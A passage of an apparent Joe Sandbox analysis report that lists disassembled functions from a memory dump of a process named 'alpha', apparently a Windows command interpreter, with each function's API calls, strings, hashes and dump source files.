Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FD0F9
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD10F
ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD166
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823FD17A
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7823FD18C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
String ID:
API String ID: 3008996577-0
Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
Instruction ID: 87271fe6c51b18b102dbb10994833c8ad19e4b4b68d08694abf8a9f68f41a301
Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
Instruction Fuzzy Hash: E1214F36B14651CAF740AB71E4100BDBBB0FB4DB4AB945125DE0E53B98DF78D445CB24

Function 00007FF7823F5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F5874
CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823F595E

Strings

wil, xrefs: 00007FF7823F58A8, 00007FF7823F5993
_p0, xrefs: 00007FF7823F5811

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CreateSemaphore
String ID: _p0$wil
API String ID: 1078844751-1814513734
Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction ID: 807a6166325d229a64678048fc2fb4d0acbe51463ae9e2531c857805f3190301
Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction Fuzzy Hash: B151E462B1974283EE65AF14A0646B9A2A0FF84B92FF44479DA0D07F81DEBCE405C320

Function 00007FF7823FB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7823FB934
GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7823E5085), ref: 00007FF7823FB9A5
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7823E5085), ref: 00007FF7823FB9F7

Strings

%WINDOWS_COPYRIGHT%, xrefs: 00007FF7823FB912

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Global$AllocAsciizCreateFreeFromStringUnicode
String ID: %WINDOWS_COPYRIGHT%
API String ID: 1103618819-1745581171
Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
Instruction ID: 069345cfbd680f5bb64e7e0e7fdcdbb599d72df694f4f654d6ca3917b6612967
Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
Instruction Fuzzy Hash: 3241C7A290874192EA50AF11E420279B7B1FB4DB91FE58279DE4D03791DF7CE885C720

Function 00007FF782400774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7824007DA

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

_wcslwr.MSVCRT ref: 00007FF78240085B
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7824008A9

Strings

[%s], xrefs: 00007FF78240080F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$_wcslwr
String ID: [%s]
API String ID: 886762496-302437576
Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction ID: d956c273e2db525fb479cb8311d6e96c983df4b7e19b9383450a590d8e62bbe0
Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
Instruction Fuzzy Hash: BA319C32709B8285EB61EF21D8503E9A7A0FB88B89F944035CE8D4BB55DF7CD685C310

Function 00007FF7823E32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E33A8: iswspace.MSVCRT(?,?,00000000,00007FF7823FD6EE,?,?,?,00007FF7823F0632), ref: 00007FF7823E33C0

iswspace.MSVCRT(?,?,?,00007FF7823E32A4), ref: 00007FF7823E331C

Strings

off, xrefs: 00007FF7823E3386

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswspace
String ID: off
API String ID: 2389812497-733764931
Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
Instruction ID: 4b2031217593703201a4752d024d04d4e5a390db72d15ef3dc20ca1450b8865a
Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
Instruction Fuzzy Hash: 94218325E0C652A1FB607B15D420679E7A0FF85B92FE88078D91E47E80DE9CE884C721

Function 00007FF7823F9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7823F9350

Part of subcall function 00007FF7823E09F4: iswspace.MSVCRT ref: 00007FF7823E0A11
Part of subcall function 00007FF7823E09F4: wcschr.MSVCRT ref: 00007FF7823E0A2B

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

Strings

DPATH, xrefs: 00007FF7823F9361, 00007FF7823F939F
PATH, xrefs: 00007FF7823F9371, 00007FF7823F93AA
%s=%s, xrefs: 00007FF7823F93C0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspace$AllocProcess
String ID: %s=%s$DPATH$PATH
API String ID: 3731854180-3148396303
Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
Instruction ID: c8e4b21825bb629b144f71d56f8391f70e62d4f5831dcec9a481430fd835bd28
Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
Instruction Fuzzy Hash: 9821C815B0865680EF54BB15F450279A360FF84B81FE8407ADD0D47B94DEBCE440C370

Function 00007FF7823E8198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00007FF7823E81EA
wcscmp.MSVCRT ref: 00007FF7823E81FD

Strings

????????.???, xrefs: 00007FF7823E81F3
*.*, xrefs: 00007FF7823E81E0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcscmp
String ID: *.*$????????.???
API String ID: 3392835482-3870530610
Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction ID: 57c706188fe7d45b213148d2696658ccb0666afcd237241c659faeca132a7e2d
Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
Instruction Fuzzy Hash: 0111C229F24B9291E764AB26E450139B2A0FB44B81FA85074CE8D47F95DFBDE881D720

Function 00007FF7823F9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7823F9146

Strings

CMD Internal Error %s, xrefs: 00007FF7823F913F
Null environment, xrefs: 00007FF7823F9138
%s, xrefs: 00007FF7823F9179

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: fprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 383729395-2781220306
Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
Instruction ID: fd34d354a674c09196115aebba6e81d383ddfed5fd1fc9274290e13301f22d00
Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
Instruction Fuzzy Hash: 3011912190864291EF55AB14E9100B9A361FB447B2FE44376D67E43AD4EFBCE886C760

Function 00007FF7823E09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 00007FF7823E0A11
wcschr.MSVCRT ref: 00007FF7823E0A2B

Strings

=,;, xrefs: 00007FF7823E0A24
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF7823E09FE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: iswspacewcschr
String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
API String ID: 287713880-1183017076
Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction ID: 532bfdfd5c79e86b235960805992d5bf39d27c42c75174d91aaf8bf34ecb5ce2
Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
Instruction Fuzzy Hash: 4FF0A425A1C656A1EA60AB41F420179E9E0FF44F42BE59174D94D53E44DF7CE484C320

Function 00007FF7823E04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823E0525
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823E0554

Strings

SetThreadUILanguage, xrefs: 00007FF7823E054D
KERNEL32.DLL, xrefs: 00007FF7823E051E

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 1646373207-2530943252
Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
Instruction ID: 1e4ba1a38b02d7eaab041f31c5eac1e9af2d1533683da926838a670fd3640a29
Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
Instruction Fuzzy Hash: E601CC65A0DA06D1EA84A711E851174A6A0FF49772BF44779C53E13BE0DEAC6C89C730

Function 00007FF7823F73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823F73DF
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823F73F5

Strings

kernelbase.dll, xrefs: 00007FF7823F73D5
RaiseFailFastException, xrefs: 00007FF7823F73EE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction ID: 0aa17d8f637b380250e31f0675de3535c99a08ec9a724d7223741cafe54ece68
Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
Instruction Fuzzy Hash: 9FF03A21B18B8192EA40AB12F444079FE60FF89BD2B98D175DA4E03B14CFBCD885C720

Function 00007FF7823D1130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D138B

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

Part of subcall function 00007FF7823D1140: towupper.MSVCRT ref: 00007FF7823D11D3

Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D14A6

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$CurrentDirectorytowupper
String ID:
API String ID: 1403193329-0
Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
Instruction ID: 11b568610cced15c52996b30241cb691fb0d83f64fc49b0569ea93eeab0e49e4
Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
Instruction Fuzzy Hash: BA61BF32B087828AE760EB61D8542EDB7B4FB44749FA04179DE9D03E99DF78E494C710

Function 00007FF7823E4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF7823E48DE
_wcsnicmp.MSVCRT ref: 00007FF7823E48FF
wcschr.MSVCRT(?,?,?,00007FF7823EED49), ref: 00007FF7823E493E

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction ID: e054e8a615b3190133d4921d067e75a7b293fbac020b45e761d7782526e41fd3
Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
Instruction Fuzzy Hash: 5751B31AE08642A1EB507F11D420179E7A0FF54B92FE88079DA0E07ED5DEACD889C370

Function 00007FF7823FF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FF3B5

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FF401
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FF442
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FF468

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction ID: 67b8f34c99b1c808fc4e9e905cf9277b940ddb33a9d92cfd28027be3a76764d2
Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
Instruction Fuzzy Hash: E731BE32719BC28AEB60DF21E8507E9B7A4FB88B85F944079EA4D47B94CF38D645C710

Function 00007FF7823E8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF7823E8FF3
RtlLookupFunctionEntry.NTDLL ref: 00007FF7823E9012
RtlVirtualUnwind.NTDLL ref: 00007FF7823E905F
__raise_securityfailure.LIBCMT ref: 00007FF7823E9144

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction ID: 1866bf5a4e4f806cbaddde4cf0c7080a1406db92ba7b3f957dec2df49e21cb62
Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
Instruction Fuzzy Hash: B041DC35A08B41D5EB90AB08F850365B764FB88755FE04139DA8D47B64DFBEE889C730

Function 00007FF7823D4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823F29C4
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F29E9
_get_osfhandle.MSVCRT ref: 00007FF7823F2A22
SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F2A39

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
